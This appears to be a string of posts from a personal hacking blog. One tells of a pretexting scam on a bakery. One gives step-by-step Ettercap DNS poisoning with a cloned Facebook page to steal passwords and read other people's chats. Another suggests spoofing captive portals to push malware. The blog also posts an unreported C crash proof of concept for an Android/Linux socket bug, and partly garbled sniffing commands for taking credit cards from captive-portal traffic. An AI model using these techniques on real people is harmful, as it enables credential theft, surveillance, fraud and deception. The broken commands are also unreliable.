Tomorrow will be the 4th OWASP Mexicali Chapter Meeting at 7pm at Café Punta del Cielo at Plaza Cimarrón (https://www.facebook.com/events/1278231598954037/)
I’ll be talking about some memory protections, these are my slides, I hope you like it!
¡Adiós, adiós Aleph1! by BelindoFan on Scribd
One of the most valuable skills in the hacking world is the social engineering… in simple words is the ability to deceive persons, or as I say “chamaquear”, well, here is the story.
(Dialogues are in spanish, because is so complex translate them to english)
I have a friend who loves the bread of dead, this is a bread of dead:
This bread is cooked on October and November for the Day of the death, one of the most important dates at Mexico. But some places start to sell the bread on September.
We live at Mexicali, but I’m from Mexico City, and in my city bakeries are more traditionals, and there are bakeries which create the bests breads of the dead. But, due to these breads are so special, the bakeries just sell them from October 290th to November 3th… so, in September, how can I get some breads?… hum..
Well.. here is the story:
- Hola - Si, Rosetta, buenas tardes - Que tal, llamo porque quiero preguntar si ya tienen pan de muerto. He escuchado que es muy bueno el suyo porque esta hecho con romero - Si, nuestra cocina esta premiada entre las 15 mejores del mundo; sin embargo lamento decirle que únicamente vendemos pan de muerto del día 29 de Octubre hasta agotar existencias - Hum.. entiendo... ¿hay forma de que usted me pueda hacer un pedido especial? - No creo realmente, a menos que fuese un volumen muy grande - Hum.. entiendo.. mire, deje me presento, me llamo Judas Gerardo, y básicamente estoy de viaje en la ciudad porque tengo un restaurante en Mexicali, y bueno, nosotros no tenemos comida muy tradicional, así que mi foco en llevar la comida más tradicional del país al norte para que sea conocida. Y para día de muertos tengo planeado llevar pan de muerto de las panaderías más tradicionales, porque allá hace tanta falta que incluso la gente se atreve a comer pan de súper mercado - Oh Dios - Exacto, entonces estoy iniciando este nuevo proyecto, y bueno encontré que Rosetta vendé el pan de muerto calificado en 2016, y me gustaría llevar unas muestras a mis socios en Mexicali para que lo prueben y en caso de que les agrede hace un pedido mucho mayor. - ¿Ha visto otras opciones? - Tengo que ser sincero, si; estoy evaluando varias panaderías de las 10 mejor calificadas, por ahora llevo dos Sucreicacoa y la Pilarika; no depende únicamente de mi elegir el que más nos guste, pero bueno al fina mi intención que llevar los mejores sabores del país hacia el norte. - Es un proyecto muy ambicioso, y dígame ¿cuantas muestras necesita? - Yo creo que unas 10. obviamente las pagaría y en caso que ustedes me lo pidan puedo pagar un costo mayor. Obviamente le preveo que si ustedes fuesen los elegidos, haríamos un pedido de al menos unas 10, 000 unidades. - Excelente, mire, me gusta su idea, déjeme le pasó al área de finanzas para poder llegar a un acuerdo
Well, this is first part… I accorded with the bakery 10 special breads for $4, 000 MX (around $200 dlls) which so expensive, but the person told me that the high price was because… actually I don’t know, but.. hum.. well… see the next part.
- Hola, vengo a recoger un pedido de 10 panes que encargue - Buenos días Judas, soy Elena, la cheff y dueña del restaurante, me comentaron acerca de su proyecto de llevar nuestro pan a Mexicali - Si - Tienes un ligero acento muy cantadito, pero en el fondo suenas normal - Si, yo soy chilango; pero bueno, me asocie con unos amigos en esta locura y bueno... la verdad es que yo no voy más allá de hacer unos huevos revueltos, pero me encargo de las relaciones comerciales - Ven Judas, siéntate conmigo, los panes los tenemos, pero quiero que pruebes uno recién salido del horno para que veas su sabor y textura; y te invito un café delicioso que nos traen de Chiapas - Ouuu... hum.. ok
Well I passed 3 hours talking about Mexicali, about food, about hacking (yeap.. I told her I’m a security guy).. and after that I got my 10 breads for free… so, my friend will taste the best breads from Mexico City, prepared specially for her by one of the most recognizzed cheffs in the world. I hope she really likes the breads because was so complicated got them.. but well, I’m an expert social engineer 😉
Ouuu.. well, from the 10 breads, just survived 2.. .for her; coff.. coff..
Yes I know.. this is not a technical post, but a good skills on social engineering some times are most important than the technical skills.
Chan, chan, charraaaa…
After read the post related to intercept Facebook’s chats, I talked with a friend about other more “interesting” things that you can do with this simple attack.
Some months ago at Mexico were reveled attacks to press supposed by the government, using SMS to infect cellphones.. well, I think a SMS is not necessary, just perform a DNS attack to a captive portal in a Starbucks, a hotel, a company.. and redirect with a simple button the user to the malware…
Doubts?… 🙂
Well… you can also apply a DNS spoofing to *.videosXXXparahackearte.com just to create karma 😛
Well.. sometimes.. it’s needed to know what are writing others about you. Why?.. hum.. well, it’s a good question, and I have a great answer.. ok, no.. but yesterday I needed… so….
The most easy way is performing a DNS poisoning, using Ettercap. Open the the ettercap.dns, and modify the different domains you want to catch using the attack, for example.. facebook.com, *.facebook.com, *.gmail.com, gmail.com, web.whatsapp.com, etc…
So, after that you have two options; sniff the traffic using wireshark.. but you need to know that you will need to attack the SSL certificates in order to read the chats, or… open SET, and select the web vectors, clon the targets and point them to your computer, for example, clone https://www.facebook.com.
Now, using Ettercap select the targets you want to attack, select in the plug-ins “DNS poison”, and start sniffing. When the user requests a website that you included in the .dns file, he/she will be redirected to your computer and pwned!… you can catch the passwords, the chats, the requests, and it will be “transparent” because actually the DNS is answering with your IP to the victim.
Don’t judge me…
Great talk about some things that happen in the bug bounty hunter’s life…
When I moved to Mexicali I passed a lot of months without finding bugs, without money, with a lot of hungry, living under a bridge (literally) and eating a lot of Maruchan soups… and I needed to invest a lot of effort on be disciplined.
To see all the talk click here: https://www.youtube.com/watch?v=BEaMhs9LmoY
Some months ago I lost my Facebook account, it was hacked by… yep.. by Karen. But, how the incredible, invencible, fabulous vendetta could be hacked?…
Well it was easy… actually very easy…
I was happy seeing a lot of extreme porn on the Internet when Karen asked me for help, so I connected to a VPN, yeap.. my fault, we were at the same IP range.
She used Ettercap to perform a DNS spoofing to www.facebook.com, pointing to her computer, and in her computer she configured a fake landing page using The Social Engineering Toolkit. I usually need to be connected to different VPN’s to work, so it’s normal to me be disconnected from my accounts. I entered to the Facebook’s messenger, entered my credentials and… pwned!
u.u
And that’s all… you don’t fall me very well que we say!
Slide from a talk presented in the Bugcrowd’s conference… and of course it isn’t hacking.
Yep… it sounds weird, maybe it sounds stupid coff.. coff.. and I know, it’s sooooo unuseful… but… well the story is this:
On saturday I went with a friend to hum… well not to walk because I live in a hell’s extension.. around 40º C so is not possible to walk but to go to some places and I tried to explain her what is the difference between hacking (pentesting, attacks to Facebook, Whatsapp interception, etc) and real hacking (mostly vuln-dev)… she started to laugh when I compared the hacking with art… and I told that yes, sometimes as you can start to write, to paint or do whatever you want to do to feel better, you can start to look for bugs… and it’s relaxing and amusing… so I showed her how to find a bug on hers phone.. and here is the result.
I’m not very sure if it is reported to Android or to the Kernel Linux project.. but I don’t want to have any thing to see with Google or with Linus Torvals… so I prefer just publish here the bug.. and in the other hand I a bad guy… so I don’t report bugs anymore.
Oh yeap… she was not convinced about hacking is like art and she told me that I’m friki because I like this kind of estrange things D: … I’m not a friki D:
#include
#include <sys/socket.h>
#include <arpa/inet.h>
#include
static int sockfd = 0;
static struct sockaddr_in addr = {0};
void fuzz(void * param){
while(1){
addr.sin_family = 0;
printf("sin_family1 = %08lx\n", addr.sin_family);
connect(sockfd, (struct sockaddr *)&addr, 16);
}
}
int main(int argc, char **argv)
{
sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
int thrd;
pthread_create(&thrd, NULL, fuzz, NULL);
while(1){
addr.sin_family = 0x1a;
addr.sin_port = 0;
addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
connect(sockfd, (struct sockaddr *)&addr, 16);
addr.sin_family = 0;
}
return 0;
}
TechTarget has been published my last article, you can read it here: http://searchdatacenter.techtarget.com/es/opinion/Pen-testing-e-ingenieria-social-si-o-no
Comments are accepted 🙂
I live near to USA, and there is so common the use of captive portals for everything, basically if you go to the bathroom you’ll find a captive portal to use the internet while you.. psss… the thing you do at the bathroom.
The captive portals are amazing places to steal juicy information like credit cards, passwords, credit cards, chats, credit cards, hashes, tokens and.. ah yeah!, credit cards.
Here my tips:
# airmon-ng start wlan0 [chanel]
# tshark -i wlanmon0 -Y "http.request.method == "GET"" || tshark -i wlanmon0 -Y "http.request.method == "POST"" | tee -a get3.
(Oh!.. this can redirect also de encrypted traffic)
# grep *.cgi *.pcap | while read line; do NOMBRE=$(echo $line | awk -F "PSM_LAST_NAME"={'print $2'} | cut -d' ' -f1) CUARTO= =$(echo $line | awk -F "ROOM_NO"={'print $2'} | cut -d' ' -f1)
(Also you can create a BASH script for the past line if you’re using a Pineapple).
🙂
Be careful, most part of the captive portals are protected by a SOC or at least an IDS… so… chill out 😉
